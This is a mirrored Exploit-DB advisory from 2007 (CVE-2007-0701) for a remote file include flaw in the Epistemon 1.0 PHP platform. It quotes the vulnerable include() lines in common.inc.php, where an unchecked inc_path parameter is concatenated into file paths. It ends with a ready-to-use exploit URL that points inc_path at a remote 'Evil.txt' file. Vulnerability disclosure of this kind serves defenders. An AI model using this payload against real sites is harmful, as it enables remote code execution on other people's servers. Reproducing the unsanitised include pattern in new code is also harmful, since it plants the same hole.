- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3247
- Проверка EDB
-
- Пройдено
- Автор
- GOLD_M
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-0701
- Дата публикации
- 2007-02-01
Код:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Epistemon 1.0 <= Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & & Contact: [email protected]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL:
http://sourcesup.cru.fr/frs/download.php/668/Epistemon_V1.tgz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /plateforme/code/inc/common.inc.php
include($inc_path.'config.php');
include ($inc_path."i18n.inc.php");
include ($inc_path."const.inc.php") ;
include ($inc_path."c_init.inc".$ext) ;
include ($inc_path."c_chapitre.inc".$ext) ;
include ($inc_path."c_color.inc".$ext) ;
include ($inc_path."c_connexion.inc".$ext);
include ($inc_path."c_file.inc".$ext) ;
include ($inc_path."c_formation.inc".$ext);
include ($inc_path."c_groupe.inc".$ext) ;
include ($inc_path."c_header.inc".$ext) ;
include ($inc_path."c_mail.inc".$ext) ;
include ($inc_path."c_membre.inc".$ext) ;
include ($inc_path."c_webmail.inc".$ext) ;
include ($inc_path."c_module.inc".$ext) ;
include ($inc_path."c_mysql.inc".$ext) ;
include ($inc_path."c_phorum.inc".$ext) ;
include ($inc_path."c_tuteur.inc".$ext) ;
include ($inc_path."c_document.inc".$ext) ;
include ($inc_path."html.inc".$ext) ;
include ($inc_path."c_complement.inc".$ext);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2007-02-01]- Источник
- www.exploit-db.com
